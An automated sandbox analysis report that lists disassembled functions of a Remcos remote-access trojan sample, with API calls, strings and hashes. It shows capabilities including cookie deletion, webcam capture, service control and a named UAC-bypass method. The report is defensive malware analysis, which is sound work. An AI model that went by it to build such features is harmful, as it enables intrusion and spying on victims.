Function 0041B68A Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 91COMMON

Download Yara Rule

APIs

Part of subcall function 0041361B: RegOpenKeyExW.ADVAPI32(80000001,00000400,00000000,00020019,?,004750E4), ref: 0041363D
Part of subcall function 0041361B: RegQueryValueExW.ADVAPI32(?,0040F313,00000000,00000000,?,00000400), ref: 0041365C
Part of subcall function 0041361B: RegCloseKey.ADVAPI32(?), ref: 00413665

Part of subcall function 0041BFB7: GetCurrentProcess.KERNEL32(?,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFC8

_wcslen.LIBCMT ref: 0041B763

Strings

program files\, xrefs: 0041B749, 0041B750, 0041B762
8SG, xrefs: 0041B709, 0041B70E
http\shell\open\command, xrefs: 0041B69A
.exe, xrefs: 0041B6B5
program files (x86)\, xrefs: 0041B75D

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: CloseCurrentOpenProcessQueryValue_wcslen
String ID: .exe$8SG$http\shell\open\command$program files (x86)\$program files\
API String ID: 37874593-122982132
Opcode ID: 2f5c0ff3d6ea7972f87a7f3e3c7ffac37502a487daadfbe7cd55c680b7f4a926
Instruction ID: 0af867b59be632d30c611c6dccf556baefac66a2e67262e696d3f692bc65d575
Opcode Fuzzy Hash: 2f5c0ff3d6ea7972f87a7f3e3c7ffac37502a487daadfbe7cd55c680b7f4a926
Instruction Fuzzy Hash: 6721A472A002086BDB14BAB58CD6AFE766D9B85328F14043FF405B72C2EE7C9D494269

Uniqueness

Uniqueness Score: -1.00%

Function 0040BEE9 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 87COMMON

Download Yara Rule

APIs

Part of subcall function 004135A6: RegOpenKeyExA.ADVAPI32(80000001,00000400,00000000,00020019,?), ref: 004135CA
Part of subcall function 004135A6: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000400), ref: 004135E7
Part of subcall function 004135A6: RegCloseKey.ADVAPI32(?), ref: 004135F2

ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040BF6B
PathFileExistsA.SHLWAPI(?), ref: 0040BF78

Strings

[IE cookies cleared!], xrefs: 0040BFC5, 0040BFEA
Cookies, xrefs: 0040BEFD
Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders, xrefs: 0040BF02
[IE cookies not found], xrefs: 0040BF40

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
API String ID: 1133728706-4073444585
Opcode ID: 246bfe7413cfec2d8385f2843d619168fbbecd56299b2e52a4c2fcf38f83732e
Instruction ID: 11f9a5ab4d81baf10890d677fe2d2a0774849eb970c5828eb217b404dd8a17fe
Opcode Fuzzy Hash: 246bfe7413cfec2d8385f2843d619168fbbecd56299b2e52a4c2fcf38f83732e
Instruction Fuzzy Hash: 38215271A4021AA6CB04F7B2CC569EE77699F10704F40017FE506B71D2EF7899498ADE

Uniqueness

Uniqueness Score: -1.00%

Function 00456B53 Relevance: 10.6, APIs: 7, Instructions: 80COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 273ab8544d097714f5f9861dee4502037fec93a611cdb24e761043779f074d75
Instruction ID: 6cb1fb7365923ae9cd4386fa22a0d7cc2d4bdc50975796c61f51bb0de8f74700
Opcode Fuzzy Hash: 273ab8544d097714f5f9861dee4502037fec93a611cdb24e761043779f074d75
Instruction Fuzzy Hash: B9110272504214BAEB216F728C0496F3AACEF85326B52422BFD11C7252DE38CC41CAA8

Uniqueness

Uniqueness Score: -1.00%

Function 00450EFA Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00450C41: _free.LIBCMT ref: 00450C6A

_free.LIBCMT ref: 00450F48

Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA

_free.LIBCMT ref: 00450F53
_free.LIBCMT ref: 00450F5E
_free.LIBCMT ref: 00450FB2
_free.LIBCMT ref: 00450FBD
_free.LIBCMT ref: 00450FC8
_free.LIBCMT ref: 00450FD3

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
Instruction ID: d9348172fd0740f80504453a64c2ebf0df3e8af845a5f6206b1ac0666941ab15
Opcode Fuzzy Hash: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
Instruction Fuzzy Hash: B411A231540B04AAD625BB72CC47FCB779CAF0230BF44491EBEED66053D6ACB9085745

Uniqueness

Uniqueness Score: -1.00%

Function 00411163 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00411170
int.LIBCPMT ref: 00411183

Part of subcall function 0040E0C1: std::_Lockit::_Lockit.LIBCPMT ref: 0040E0D2
Part of subcall function 0040E0C1: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E0EC

std::_Facet_Register.LIBCPMT ref: 004111C3
std::_Lockit::~_Lockit.LIBCPMT ref: 004111CC
__CxxThrowException@8.LIBVCRUNTIME ref: 004111EA

Strings

(mG, xrefs: 0041117B

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
String ID: (mG
API String ID: 2536120697-4059303827
Opcode ID: 34a51a48ebffab58c1c893f3ae79879d0a70666fb45cbfefdea1ee74b3510b9f
Instruction ID: 9d9da6683174d9a5c92fa95d325e3547e0845688fcbb555b93a4fb26f280994d
Opcode Fuzzy Hash: 34a51a48ebffab58c1c893f3ae79879d0a70666fb45cbfefdea1ee74b3510b9f
Instruction Fuzzy Hash: 1411EB32900518A7CB14BB9AD8058DEBB79DF44354F10456FBE04A72D1DB789D40C7D9

Uniqueness

Uniqueness Score: -1.00%

Function 0041B2C3 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 61COMMON

Download Yara Rule

APIs

Part of subcall function 0041BFB7: GetCurrentProcess.KERNEL32(?,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFC8

Part of subcall function 004135A6: RegOpenKeyExA.ADVAPI32(80000001,00000400,00000000,00020019,?), ref: 004135CA
Part of subcall function 004135A6: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000400), ref: 004135E7
Part of subcall function 004135A6: RegCloseKey.ADVAPI32(?), ref: 004135F2

StrToIntA.SHLWAPI(00000000,0046C9F8,00000000,00000000,00000000,004750E4,00000003,Exe,00000000,0000000E,00000000,004660BC,00000003,00000000), ref: 0041B33C

Strings

SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 0041B2D7, 0041B2E1, 0041B322
(64 bit), xrefs: 0041B368
(32 bit), xrefs: 0041B36F
ProductName, xrefs: 0041B2D2
CurrentBuildNumber, xrefs: 0041B31D

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: CloseCurrentOpenProcessQueryValue
String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
API String ID: 1866151309-2070987746
Opcode ID: 739a84b6b521fba7f3deec685196c40b2f0f20dc19e43594882229fa67cbe478
Instruction ID: 0537cd1ef0e49ffa1b211e53375311a7de90e31f2ded896f28e78de68f6ce99c
Opcode Fuzzy Hash: 739a84b6b521fba7f3deec685196c40b2f0f20dc19e43594882229fa67cbe478
Instruction Fuzzy Hash: 42112370A4010566C704B3668C87EFF77198B95314F94013BF856A21E2FB6C599683AE

Uniqueness

Uniqueness Score: -1.00%

Function 0043A35A Relevance: 10.6, APIs: 7, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,0043A351,004392BE), ref: 0043A368
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0043A376
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043A38F
SetLastError.KERNEL32(00000000,?,0043A351,004392BE), ref: 0043A3E1

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: eac7a4b750c305e7b0904a447f782895729b7b2cae8ca2bab40c67d71c469531
Instruction ID: 5d53a0da36a7034647469206452edf011e0dcb0cee8899775f26e7a14c982385
Opcode Fuzzy Hash: eac7a4b750c305e7b0904a447f782895729b7b2cae8ca2bab40c67d71c469531
Instruction Fuzzy Hash: 7F01283214C3519EA61526796C86A6B2648EB0A7B9F30133FF918815F1EF594C90514D

Uniqueness

Uniqueness Score: -1.00%

Function 004075B0 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 59COMMON

Download Yara Rule

APIs

CoInitializeEx.OLE32(00000000,00000002,00000000,C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe), ref: 004075D0

Part of subcall function 004074FD: _wcslen.LIBCMT ref: 00407521
Part of subcall function 004074FD: CoGetObject.OLE32(?,00000024,00466518,00000000), ref: 00407582

CoUninitialize.OLE32 ref: 00407629

Strings

[+] ShellExec success, xrefs: 0040760E
C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe, xrefs: 004075B0, 004075B3, 00407605
[+] before ShellExec, xrefs: 004075F1
[+] ucmCMLuaUtilShellExecMethod, xrefs: 004075B5

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: InitializeObjectUninitialize_wcslen
String ID: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
API String ID: 3851391207-212451407
Opcode ID: 511e675c99acabaccc32e6a32445821ea963e9a83317c60cb45550512dba77c0
Instruction ID: 681a2da4e9d4b9e6b45db6330fec0c9e961fb52a18ca78f8243115a9baea1a6b
Opcode Fuzzy Hash: 511e675c99acabaccc32e6a32445821ea963e9a83317c60cb45550512dba77c0
Instruction Fuzzy Hash: B201D272B087016BE2245B25DC0EF6B7758DB81729F11083FF902A61C2EBA9BC0145AB

Uniqueness

Uniqueness Score: -1.00%

Function 0040BAA1 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 49fileCOMMON

Download Yara Rule

APIs

DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040BADD
GetLastError.KERNEL32 ref: 0040BAE7

Strings

[Chrome Cookies found, cleared!], xrefs: 0040BB0D
[Chrome Cookies not found], xrefs: 0040BB01
\AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040BAA8
UserProfile, xrefs: 0040BAAD

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: DeleteErrorFileLast
String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
API String ID: 2018770650-304995407
Opcode ID: 3ac18cd69eb512cfe3046ffff68c330a49271f1a171cc2acfba67e1dc9669370
Instruction ID: 6bc0ec4de36c0471385c24d45a27137009bd471b3f80e31671ebbef4da92dce6
Opcode Fuzzy Hash: 3ac18cd69eb512cfe3046ffff68c330a49271f1a171cc2acfba67e1dc9669370
Instruction Fuzzy Hash: 08018F31A402095ACA04BBBACD5B8BE7724E912714F50017BF802726E6FE7D5A059ADE

Uniqueness

Uniqueness Score: -1.00%

Function 0041CD9B Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

AllocConsole.KERNEL32(00475338), ref: 0041CDA4
ShowWindow.USER32(00000000,00000000), ref: 0041CDBD
SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CDE2

Strings

CONOUT$, xrefs: 0041CDD0
Remcos v, xrefs: 0041CDFD
4.9.4 Pro, xrefs: 0041CE0B

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: Console$AllocOutputShowWindow
String ID: Remcos v$4.9.4 Pro$CONOUT$
API String ID: 2425139147-3065609815
Opcode ID: 7204a5bae693ec2f4884850c6238c56aa94b879f8555490226ef59d43c8bca4e
Instruction ID: 3d4e39fb732e2b6cb40f789e287104da8d9afdf675614735db993d10cd8ea689
Opcode Fuzzy Hash: 7204a5bae693ec2f4884850c6238c56aa94b879f8555490226ef59d43c8bca4e
Instruction Fuzzy Hash: CD0188719803087AD610F7F1DC8BF9D776C5B14705F6004277604A70D3E7BD9954466E

Uniqueness

Uniqueness Score: -1.00%

Function 0044333A Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,PkGNG,004432EB,00000003,PkGNG,0044328B,00000003,0046E948,0000000C,004433E2,00000003,00000002), ref: 0044335A
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0044336D
FreeLibrary.KERNEL32(00000000,?,?,PkGNG,004432EB,00000003,PkGNG,0044328B,00000003,0046E948,0000000C,004433E2,00000003,00000002,00000000,PkGNG), ref: 00443390

Strings

CorExitProcess, xrefs: 00443365
mscoree.dll, xrefs: 00443353
PkGNG, xrefs: 0044333C

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$PkGNG$mscoree.dll
API String ID: 4061214504-213444651
Opcode ID: cc52f7ac488aa55dad4b7db89aaf695af0dd1fe717ea7d7a85019ca2162c21c0
Instruction ID: b4f1316bd170a33105784e50650a9bde6d9e9410588fddf83d5a1a7bf10dc45d
Opcode Fuzzy Hash: cc52f7ac488aa55dad4b7db89aaf695af0dd1fe717ea7d7a85019ca2162c21c0
Instruction Fuzzy Hash: 6AF0A430A00208FBDB149F55DC09B9EBFB4EF04713F0041A9FC05A2261CB349E40CA98

Uniqueness

Uniqueness Score: -1.00%

Function 0043AADC Relevance: 9.3, APIs: 6, Instructions: 284COMMON

Download Yara Rule

APIs

__allrem.LIBCMT ref: 0043AC69
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AC85
__allrem.LIBCMT ref: 0043AC9C
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043ACBA
__allrem.LIBCMT ref: 0043ACD1
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043ACEF

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
String ID:
API String ID: 1992179935-0
Opcode ID: 324a3f8db7a4af308d45995ace6313bc09822ddcf2faf4fc4501ccf235525b64
Instruction ID: 0cac597ccac2158415e78c81c2c349525783c2449c9f0a8280db41f57d0428da
Opcode Fuzzy Hash: 324a3f8db7a4af308d45995ace6313bc09822ddcf2faf4fc4501ccf235525b64
Instruction Fuzzy Hash: CC812B72640706ABE7209F29CC41B5BB3A9EF48324F24552FF590D7781EB7CE9108B5A

Uniqueness

Uniqueness Score: -1.00%

Function 00404371 Relevance: 9.2, APIs: 1, Strings: 5, Instructions: 206sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000,?), ref: 004044C4

Part of subcall function 00404607: __EH_prolog.LIBCMT ref: 0040460C

Strings

CloseCamera, xrefs: 0040458E
GetFrame, xrefs: 0040459F
OpenCamera, xrefs: 00404582
FreeFrame, xrefs: 004045B0
HNG, xrefs: 004045E6

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: H_prologSleep
String ID: CloseCamera$FreeFrame$GetFrame$HNG$OpenCamera
API String ID: 3469354165-3054508432
Opcode ID: 08fcd3a8c76131e8007374677ce5b6c0692de0a008e8c0ef5a68710063425739
Instruction ID: 62663cdee79800d8a54f028f5a980ee1c6790ad11611a7059aef087dab150aaf
Opcode Fuzzy Hash: 08fcd3a8c76131e8007374677ce5b6c0692de0a008e8c0ef5a68710063425739
Instruction Fuzzy Hash: 5C51E1B1A042116BCA14FB369D0A66E3755ABC5748F00053FFA06677E2EF7C8A45839E

Uniqueness

Uniqueness Score: -1.00%

Function 004458F9 Relevance: 9.2, APIs: 6, Instructions: 200COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftoe.LIBCMT ref: 00445925
__cftoe.LIBCMT ref: 00445957

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: __cftoe
String ID:
API String ID: 4189289331-0
Opcode ID: 73f4726c011166e6bdcb5754414c0ade346116ed487fada7dd59cfb8b2f8224a
Instruction ID: 6c78d09a6f5169ef6f707262af513c71f712f2c279f5202ad8aecd4a6012115a
Opcode Fuzzy Hash: 73f4726c011166e6bdcb5754414c0ade346116ed487fada7dd59cfb8b2f8224a
Instruction Fuzzy Hash: D951EA72900A05ABFF209B59CC81FAF77A9EF49334F14421FF515A6293DB39D900866C

Uniqueness

Uniqueness Score: -1.00%

Function 0041AC78 Relevance: 9.1, APIs: 6, Instructions: 67serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,00000000,?,?,?,0041A38E,00000000), ref: 0041AC88
OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,?,?,0041A38E,00000000), ref: 0041AC9C
CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A38E,00000000), ref: 0041ACA9
ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,0041A38E,00000000), ref: 0041ACDE
CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A38E,00000000), ref: 0041ACF0
CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A38E,00000000), ref: 0041ACF3

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: Service$CloseHandle$Open$ChangeConfigManager
String ID:
API String ID: 493672254-0
Opcode ID: f3d4b447748c037b2dac55463b57a149c398f0d820f611c96b244fdc7ed94624
Instruction ID: ed0bae8235b77a8e2b5b4951a925fd67a34dfbd091713fce30693036f81a5133
Opcode Fuzzy Hash: f3d4b447748c037b2dac55463b57a149c398f0d820f611c96b244fdc7ed94624
Instruction Fuzzy Hash: 84014E311452147BD6110B385C4DEFB3B5CDB42771F100317F925922D1EA68CD45B5EE

Uniqueness

Uniqueness Score: -1.00%

Function 0044A004 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 305COMMONLIBRARYCODE

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 0044A08F
__alldvrm.LIBCMT ref: 0044A290
__alldvrm.LIBCMT ref: 0044A2B2

Strings

PkGNG, xrefs: 0044A006

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: __alldvrm$_strrchr
String ID: PkGNG
API String ID: 1036877536-263838557
Opcode ID: 6e4ce0a9cd107544135c8758f381171db584a835852a0c7515be2cd765a07ccf
Instruction ID: 0200e234d7a66e392568480c50467de0d06b46efb2a76a7ba0b74d69ca9a70f2
Opcode Fuzzy Hash: 6e4ce0a9cd107544135c8758f381171db584a835852a0c7515be2cd765a07ccf
Instruction Fuzzy Hash: 57A166319843869FFB21CF58C8817AEBBA1FF25304F1441AFE9859B382C27D8951C75A

Uniqueness

Uniqueness Score: -1.00%

Function 00448215 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,0043F720,0043A7F5,0043F720,00474EF8,PkGNG,0043CE15,FF8BC35D,00474EF8,00474EF8), ref: 00448219
_free.LIBCMT ref: 0044824C
_free.LIBCMT ref: 00448274
SetLastError.KERNEL32(00000000,?,?,00000000), ref: 00448281
SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044828D
_abort.LIBCMT ref: 00448293

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: d577d612c1ffbc00090520c66a2c794f4cb9603406b177c38f93d9dbc2276fca
Instruction ID: 1e51d54565af68f960eede883612623578b8b4ccb82fc25c91f14e3db4823c68
Opcode Fuzzy Hash: d577d612c1ffbc00090520c66a2c794f4cb9603406b177c38f93d9dbc2276fca
Instruction Fuzzy Hash: 15F0F935104F006AF611332A6C05B5F2515ABC276AF25066FF92892292DFACCC4581AD

Uniqueness

Uniqueness Score: -1.00%

Function 0041AAA6 Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00000001,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAB5
OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAC9
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAD6
ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAE5
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAF7
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAFA

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: Service$CloseHandle$Open$ControlManager
String ID:
API String ID: 221034970-0
Opcode ID: bc8933c3fd8e2fa998b2246ab8c72ed9b0f5170f60f0245b371609b51ac54b8f
Instruction ID: 651adf303b3d55a6ad93a9774d9c6d096703db2647e4265c62a250da7e042a32
Opcode Fuzzy Hash: bc8933c3fd8e2fa998b2246ab8c72ed9b0f5170f60f0245b371609b51ac54b8f
Instruction Fuzzy Hash: 68F0C231541218ABD711AF25AC49EFF3B6CDF45BA2F000026FE0992192DB68CD4695E9

Uniqueness

Uniqueness Score: -1.00%

Function 0041ABAA Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABB9
OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABCD
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABDA
ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABE9
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABFB
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABFE

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: Service$CloseHandle$Open$ControlManager
String ID:
API String ID: 221034970-0
Opcode ID: 94d93926ec858c5890fc603d54741d931e0eaafa3f6b468ff921a10e10d86c77
Instruction ID: cdcae22f94af1ce7d279f83afe572816001e75aa845eac4345c2c81124f82824
Opcode Fuzzy Hash: 94d93926ec858c5890fc603d54741d931e0eaafa3f6b468ff921a10e10d86c77
Instruction Fuzzy Hash: 84F0C231501218ABD6116F259C49DFF3B6CDB45B62F40002AFE0996192EB38DD4595F9

Uniqueness

Uniqueness Score: -1.00%

Function 0041AC11 Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC20
OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC34
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC41
ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC50
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC62
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC65

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: Service$CloseHandle$Open$ControlManager
String ID:
API String ID: 221034970-0
Opcode ID: 4f42f77feb4e09d2984437374767d6fba58dab4553ac710dbf5187c031f369c2
Instruction ID: 1af6be829003de2eeb85b71d4b0cbdb2c911632148e7083bdbbda8586ff13133
Opcode Fuzzy Hash: 4f42f77feb4e09d2984437374767d6fba58dab4553ac710dbf5187c031f369c2
Instruction Fuzzy Hash: 2FF0F631501228BBD711AF25EC49DFF3B6CDB45B62F00002AFE0992192EB38CD4595F9

Uniqueness

Uniqueness Score: -1.00%

Function 00442801 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 133COMMON

Download Yara Rule

Strings

PkGNG, xrefs: 00442803

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

